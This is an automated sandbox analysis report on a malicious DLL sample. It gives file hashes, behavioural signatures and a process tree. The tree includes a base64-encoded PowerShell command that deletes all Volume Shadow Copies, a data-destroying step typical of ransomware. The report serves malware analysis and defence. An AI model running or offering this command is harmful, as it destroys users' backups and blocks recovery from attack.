Analysis
-
max time kernel
123s -
max time network
123s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
30-01-2022 07:55
Static task
static1
Behavioral task
behavioral1
Sample
2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll
Resource
win10-en-20211208
General
-
Target
2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll
-
Size
166KB
-
MD5
b0202897062e62cdbf80a329b496534f
-
SHA1
c15ea2f6565e9aa89be81fa49a0daeb83d205014
-
SHA256
2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c
-
SHA512
b9bc991412f76055876d18648d37763ca0437b2c70f6464c0c6d18f6d8a1fc40ddd85fcef68194b1a07f7d0eccba86605a4d2d013544372fe1093e0fe51f6211
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 324 rundll32.exe 776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 324 rundll32.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeBackupPrivilege 2024 vssvc.exe Token: SeRestorePrivilege 2024 vssvc.exe Token: SeAuditPrivilege 2024 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 1968 wrote to memory of 324 1968 rundll32.exe 27 PID 324 wrote to memory of 776 324 rundll32.exe 28 PID 324 wrote to memory of 776 324 rundll32.exe 28 PID 324 wrote to memory of 776 324 rundll32.exe 28 PID 324 wrote to memory of 776 324 rundll32.exe 28
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024